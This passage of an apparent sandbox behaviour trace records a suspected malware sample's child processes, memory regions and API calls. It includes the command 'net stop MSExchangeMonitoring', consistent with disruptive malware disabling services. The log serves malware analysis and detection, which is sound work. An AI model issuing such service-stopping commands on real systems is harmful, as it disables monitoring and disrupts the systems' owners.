_BufferCount=0x13, _Format="%08X", _ArgList=0x468ef04 | out: _Buffer="00000002") returned 8 [0138.437] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0138.437] GetEnvironmentStringsW () returned 0x49b7d78* [0138.437] FreeEnvironmentStringsA (penv="=") returned 1 [0138.437] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0138.437] GetEnvironmentStringsW () returned 0x49b7d78* [0138.437] FreeEnvironmentStringsA (penv="=") returned 1 [0138.437] DeleteProcThreadAttributeList (in: lpAttributeList=0x468ef90 | out: lpAttributeList=0x468ef90) [0138.437] _get_osfhandle (_FileHandle=1) returned 0x3c [0138.437] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0138.437] _get_osfhandle (_FileHandle=1) returned 0x3c [0138.437] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0138.437] _get_osfhandle (_FileHandle=0) returned 0x38 [0138.437] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0138.437] SetConsoleInputExeNameW () returned 0x1 [0138.437] GetConsoleOutputCP () returned 0x1b5 [0138.438] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0138.438] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.438] exit (_Code=2) Thread: id = 681 os_tid = 0xf90 Process: id = "226" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x13771000" os_pid = "0xfe8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "225" os_parent_pid = "0xfa0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11055 start_va = 0x7fee7000 end_va = 0x7fee7fff entry_point = 0x0 region_type = private name = "private_0x000000007fee7000" filename = "" Region: id = 11056 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11057 start_va = 0x640cc90000 end_va = 0x640ccaffff entry_point = 0x0 region_type = private name = "private_0x000000640cc90000" filename = "" Region: id = 11058 start_va = 0x640ccb0000 end_va = 0x640ccc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000640ccb0000" filename = "" Region: id = 11059 start_va = 0x640ccd0000 end_va = 0x640cd0ffff entry_point = 0x0 region_type = private name = "private_0x000000640ccd0000" filename = "" Region: id = 11060 start_va = 0x7df5ffe70000 end_va = 0x7ff5ffe6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe70000" filename = "" Region: id = 11061 start_va = 0x7ff6c48b0000 end_va = 0x7ff6c48d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c48b0000" filename = "" Region: id = 11062 start_va = 0x7ff6c48dd000 end_va = 0x7ff6c48defff entry_point = 0x0 region_type = private name = "private_0x00007ff6c48dd000" filename = "" Region: id = 11063 start_va = 0x7ff6c48df000 end_va = 0x7ff6c48dffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c48df000" filename = "" Region: id = 11064 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 11065 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11066 start_va = 0x640cc90000 end_va = 0x640cc9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000640cc90000" filename = "" Region: id = 11067 start_va = 0x640cca0000 end_va = 0x640cca6fff entry_point = 0x0 region_type = private name = "private_0x000000640cca0000" filename = "" Region: id = 11068 start_va = 0x640cd10000 end_va = 0x640cd4ffff entry_point = 0x0 region_type = private name = "private_0x000000640cd10000" filename = "" Region: id = 11069 start_va = 0x640cd50000 end_va = 0x640cd50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000640cd50000" filename = "" Region: id = 11070 start_va = 0x640cd60000 end_va = 0x640cd66fff entry_point = 0x0 region_type = private name = "private_0x000000640cd60000" filename = "" Region: id = 11071 start_va = 0x640cd70000 end_va = 0x640cd70fff entry_point = 0x0 region_type = private name = "private_0x000000640cd70000" filename = "" Region: id = 11072 start_va = 0x640cd80000 end_va = 0x640cd80fff entry_point = 0x0 region_type = private name = "private_0x000000640cd80000" filename = "" Region: id = 11073 start_va = 0x640cdb0000 end_va = 0x640ceaffff entry_point = 0x0 region_type = private name = "private_0x000000640cdb0000" filename = "" Region: id = 11074 start_va = 0x640ceb0000 end_va = 0x640cf6dfff entry_point = 0x640ceb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11075 start_va = 0x640cff0000 end_va = 0x640cffffff entry_point = 0x0 region_type = private name = "private_0x000000640cff0000" filename = "" Region: id = 11076 start_va = 0x640d000000 end_va = 0x640d187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000640d000000" filename = "" Region: id = 11077 start_va = 0x640d190000 end_va = 0x640d310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000640d190000" filename = "" Region: id = 11078 start_va = 0x640d320000 end_va = 0x640e71ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000640d320000" filename = "" Region: id = 11079 start_va = 0x7ff6c47b0000 end_va = 0x7ff6c48affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c47b0000" filename = "" Region: id = 11080 start_va = 0x7ff6c48db000 end_va = 0x7ff6c48dcfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c48db000" filename = "" Region: id = 11081 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 11082 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 11083 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11084 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11085 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 11086 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11087 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11088 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11089 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11090 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11091 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11092 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 11093 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 11094 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 678 os_tid = 0xfc8 Thread: id = 679 os_tid = 0xfa4 Thread: id = 680 os_tid = 0xf98 Process: id = "227" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x13e6c000" os_pid = "0xf9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "225" os_parent_pid = "0xfa0" cmd_line = "net stop MSExchangeMonitoring" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11108 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 11109 start_va = 0xdf0000 end_va = 0x4deffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000df0000" filename = "" Region: id = 11110 start_va = 0x4df0000 end_va = 0x4e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 11111 start_va = 0x4e10000 end_va = 0x4e11fff entry_point = 0x0 region_type = private name = "private_0x0000000004e10000" filename = "" Region: id = 11112 start_va = 0x4e20000 end_va = 0x4e33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e20000" filename = "" Region: id = 11113 start_va = 0x4e40000 end_va = 0x4e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e40000" filename = "" Region: id = 11114 start_va = 0x4e80000 end_va = 0x4efffff entry_point = 0x0 region_type = private name = "private_0x0000000004e80000" filename = "" Region: id = 11115 start_va = 0x4f00000 end_va = 0x4f03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f00000" filename = "" Region: id = 11116 start_va = 0x4f10000 end_va = 0x4f10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f10000" filename = "" Region: id = 11117 start_va = 0x4f20000 end_va = 0x4f21fff entry_point = 0x0 region_type = private name = "private_0x0000000004f20000" filename = "" Region: id = 11118 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11119 start_va = 0x7ec60000 end_va = 0x7ec82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec60000" filename = "" Region: id = 11120 start_va = 0x7ec88000 end_va = 0x7ec88fff entry_point = 0x0 region_type = private name = "private_0x000000007ec88000" filename = "" Region: id = 11121 start_va = 0x7ec89000 end_va = 0x7ec89fff entry_point = 0x0 region_type = private name = "private_0x000000007ec89000" filename = "" Region: id = 11122 start_va = 0x7ec8d000 end_va = 0x7ec8ffff entry_point = 0x0 region_type = private name = "private_0x000000007ec8d000" filename = "" Region: id = 11123 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11124 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11125 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11126 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11127 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11128 start_va = 0x4f50000 end_va = 0x4f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f50000" filename = "" Region: id = 11129 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11130 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11131 start_va = 0x5080000 end_va = 0x517ffff entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 11132 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 682 os_tid = 0xfd0 Thread: id = 683 os_tid = 0xf88 Process: id = "228" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x29ee0000" os_pid = "0xf8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "227" os_parent_pid = "0xf9c" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeMonitoring" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11133 start_va = 0xd30000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 11134 start_va = 0xd50000 end_va = 0xd51fff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 11135 start_va = 0xd60000 end_va = 0xd73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 11136 start_va = 0xd80000 end_va = 0xdbffff entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 11137 start_va = 0xdc0000 end_va = 0xe3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 11138 start_va = 0xe40000 end_va = 0xe43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e40000" filename = "" Region: id = 11139 start_va = 0xe50000 end_va = 0xe50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e50000" filename = "" Region: id = 11140 start_va = 0xe60000 end_va = 0xe61fff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 11141 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 11142 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 11143 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11144 start_va = 0x7f770000 end_va = 0x7f792fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f770000" filename = "" Region: id = 11145 start_va = 0x7f796000 end_va = 0x7f796fff entry_point = 0x0 region_type = private name = "private_0x000000007f796000" filename = "" Region: id = 11146 start_va = 0x7f798000 end_va = 0x7f798fff entry_point = 0x0 region_type = private name = "private_0x000000007f798000" filename = "" Region: id = 11147 start_va = 0x7f79d000 end_va = 0x7f79ffff entry_point = 0x0 region_type = private name = "private_0x000000007f79d000" filename = "" Region: id = 11148 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11149 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11150 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11151 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11152 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11153 start_va = 0x1020000 end_va = 0x102ffff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 11154 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11155 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11156 start_va = 0x5260000 end_va = 0x535ffff entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 11157 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 11158 start_va = 0xd30000 end_va = 0xd3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d30000" filename = "" Region: id = 11159 start_va = 0xd40000 end_va = 0xd43fff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 11160 start_va = 0xe70000 end_va = 0xf2dfff entry_point = 0xe70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11161 start_va = 0xf30000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 11162 start_va = 0xf70000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 11163 start_va = 0x51b0000 end_va = 0x51bffff entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 11164 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 11165 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 11166 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 11167 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 11168 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 11169 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 11170 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 11171 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 11172 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 11173 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 11174 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 11175 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 11176 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 11177 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11178 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 11179 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 11180 start_va = 0x7f670000 end_va = 0x7f76ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f670000" filename = "" Region: id = 11181 start_va = 0x7f79a000 end_va = 0x7f79cfff entry_point = 0x0 region_type = private name = "private_0x000000007f79a000" filename = "" Region: id = 11182 start_va = 0xd50000 end_va = 0xd53fff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 11183 start_va = 0xff0000 end_va = 0xff2fff entry_point = 0xff0000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 11184 start_va = 0x1030000 end_va = 0x1061fff entry_point = 0x1030000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 684 os_tid = 0xfcc [0138.413] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0138.413] __set_app_type (_Type=0x1) [0138.413] __p__fmode () returned 0x77ac4d6c [0138.413] __p__commode () returned 0x77ac5b1c [0138.413] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0138.413] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0138.413] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0138.413] GetConsoleOutputCP () returned 0x1b5 [0138.414] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0138.414] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.416] sprintf_s (in: _DstBuf=0xe3f88c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0138.416] setlocale (category=0, locale=".437") returned="English_United States.437" [0138.418] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0138.418] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0138.418] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMonitoring" [0138.418] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xe3f634, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0138.418] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xe3f628 | out: Buffer=0xe3f628*=0x5267f70) returned 0x0 [0138.418] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xe3f62c | out: Buffer=0xe3f62c*=0x5267fa0) returned 0x0 [0138.418] __iob_func () returned 0x77ac1208 [0138.418] _fileno (_File=0x77ac1208) returned 0 [0138.418] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0138.418] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0138.418] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0138.418] _wcsicmp (_String1="config", _String2="stop") returned -16 [0138.418] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0138.418] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0138.418] _wcsicmp (_String1="file", _String2="stop") returned -13 [0138.418] _wcsicmp (_String1="files", _String2="stop") returned -13 [0138.418] _wcsicmp (_String1="group", _String2="stop") returned -12 [0138.418] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0138.418] _wcsicmp (_String1="help", _String2="stop") returned -11 [0138.418] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0138.418] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0138.418] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0138.418] _wcsicmp (_String1="session", _String2="stop") returned -15 [0138.418] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0138.418] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0138.418] _wcsicmp (_String1="share", _String2="stop") returned -12 [0138.418] _wcsicmp (_String1="start", _String2="stop") returned -14 [0138.418] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0138.418] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0138.418] 